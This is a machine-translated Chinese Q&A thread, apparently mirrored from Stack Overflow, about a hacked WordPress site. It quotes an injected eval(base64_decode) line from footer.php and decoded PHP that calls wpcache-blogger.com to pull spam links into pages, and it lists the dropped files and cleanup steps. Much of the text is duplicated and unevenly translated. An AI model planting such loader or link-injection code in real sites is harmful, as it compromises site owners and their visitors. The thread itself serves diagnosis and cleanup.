神秘的突然wordpress错误:wpcache-blogger.com/sape-rolling-sites/config.php

神秘的突然wordpress错误:wpcache-blogger.com/sape-rolling-sites/config.php,php,wordpress,Php,Wordpress,突然,我的wordpress网站上出现了: 分析错误:语法错误,意外的“;”,第79行/var/www/admin/data/www/wpcache-blogger.com/sape-rolling-sites/config.php中的“') 我已经有一段时间没有编辑任何内容了&如果我通过FTP查找文件夹,在var/www下没有名为“admin”的文件夹 你们以前见过这样的吗? 我发现了另一条线索,但没有解决办法,显然这发生在一些人身上,但似乎没有最终的答案 如果您对此有任何经验,请告诉我答案在

突然,我的wordpress网站上出现了:

分析错误:语法错误,意外的“;”,第79行/var/www/admin/data/www/wpcache-blogger.com/sape-rolling-sites/config.php中的“')

我已经有一段时间没有编辑任何内容了&如果我通过FTP查找文件夹,在
var/www
下没有名为“admin”的文件夹

你们以前见过这样的吗? 我发现了另一条线索,但没有解决办法,显然这发生在一些人身上,但似乎没有最终的答案


如果您对此有任何经验,请告诉我答案在您的根目录中

进入文件系统并找到footer.php

然后找到模板/footer.php

您将看到以下内容:

/*/eval(base64_解码("ZNVUY3RPB24GZMLSzV9NZXRFY29UDGVUdhny3VYBCGdXJSB7CIAKY2GGPSBJDXJSX2luaxqOktskign1CmxFC2V0B3B0KCrJavaWgQ1VSte9QvF9VYBF9ZZZZXRvChqOjNolCBVjMT1Bux1JFvStlRqU5TrKVSLCAxCdSkign1CmxFC2V0Bb3B0KCrJavacWgQ1VSteQv9VukWgWgWgWgWgWg9VgWgWgWgWgWgWgWgWgWg1c(2)X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X KS4IIIK7CMVJAG8gJGxpbmtzOw==”);/*/?>

移除它


从两个区域和保存-这将解决问题

答案在您的根目录中

进入文件系统并找到footer.php

然后找到模板/footer.php

您将看到以下内容:

/*/eval(base64_解码(“ZNVUY3RPB24GZMLSzV9NZXRFY29UDGVUdhny3VYBCGdXJSB7CIAKY2GGPSBJDXJSX2luaxqOktskign1CmxFC2V0B3B0KCrJavaWgQ1VSte9QvF9VYBF9ZZZZXRvChqOjNolCBVjMT1Bux1JFvStlRqU5TrKVSLCAxCdSkign1CmxFC2V0Bb3B0KCrJavacWgQ1VSteQv9VukWgWgWgWgWgWg9VgWgWgWgWgWgWgWgWgWg1c(2)X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X KS4IIIK7CMVJAG8gJGxpbmtzOw==”);/*/?>

移除它


从两个区域和保存-这将解决问题

这就是代码所做的

function file_get_contents_curl($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "LOCALSAPE");
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$links = file_get_contents_curl("http://wpcache-blogger.com/getlinks.php?               apicode=lalala44&pageurl=".urlencode('http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'])."&use   ragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."");
echo $links;

这就是代码所做的

function file_get_contents_curl($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "LOCALSAPE");
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$links = file_get_contents_curl("http://wpcache-blogger.com/getlinks.php?               apicode=lalala44&pageurl=".urlencode('http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'])."&use   ragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."");
echo $links;

你感染的不仅仅是页脚。 检查是否有以下文件:

footer.php,  frommshead.php,  options-admin.php,  wpinstall - Copy.php

footer是添加iframe的地方(在base64中),其余部分是感染它的代码

感染它的不仅仅是footer。 检查是否有以下文件:

footer.php,  frommshead.php,  options-admin.php,  wpinstall - Copy.php

footer是iframe添加的地方(在base64中),其余的是感染它的代码

这一切都与Revolution Slider插件有关。请确保首先更新Slider。然后更改footer并删除文件。frommhead.php,options-admin.php,wpsinstall-copy.php


如果您的服务器上安装了多个wordpress,请检查所有这些文件。

此黑客行为都与Revolution Slider插件有关。请确保先更新Slider。然后更改页脚并删除文件。frommhead.php,options-admin.php,wpsinstall-copy.php


如果您的服务器上有多个wordpress安装,请检查所有安装。

如果您发现您可能应该在那里添加信息,而不是询问其他版本。下面是at文章的链接,该文章解释了最近与wpcache blogger相关的黑客行为:如果您发现您可能应该在那里添加信息,而不是询问其他版本。这里这是一个at文章的链接,该文章解释了最近与wpcache blogger相关的黑客行为:那么,基本上,@ahog的网站已经被黑客攻击了?你可能想提到这一点,并指出防止其再次被黑客攻击的措施……感谢你这么多的工作!最近恶意软件出现了很多问题,我得到了保护,更改了FTP密码,而且每一次都有但它总是回来…非常感谢您,该网站已经重新编写了页脚修复程序还可以,但请更改整个密码设置以下文件都是由此黑客创建的:“wp includes/xmlrpc.php”“wp includes/.htaccess”“wp admin/.htaccess”“wp admin/ms head.php”“wp admin/headers/wp class headers.php”wp admin/headers/jquery.php“wp admin/options admin.php”wp admin/class wp index.php“wp-options.php”“另外,根目录中的main index.php被感染,应该由一个干净的站点/installSo的副本替换。那么,基本上,@ahog的站点被黑客攻击了?您可能想提到这一点,并指出防止它被重新黑客攻击的措施…非常感谢您的工作!最近恶意软件出现了很多问题,我得到了保护,更改了FTP密码等等,但它总是回来。。。非常感谢您,该站点已经重新编写了页脚修复程序还可以,但请更改整个密码设置以下文件都是由此黑客创建的:“wp includes/xmlrpc.php”“wp includes/.htaccess”“wp admin/.htaccess”“wp admin/ms head.php”“wp admin/headers/wp class headers.php”“wp admin/headers/jquery.php”“wp admin/options admin.php”“wp admin/class wp index.php”“wp options.php”此外,根目录中的main index.php已感染,应替换为干净站点的副本/installBlack Hat attack?SAPE?安装此插件“限制登录尝试”“重新包装后谢谢你的提示,我马上就这么做了!黑帽袭击的解释就这么多?SAPE?重新安装后安装此插件“限制登录尝试”。谢谢你的提示,我正在这样做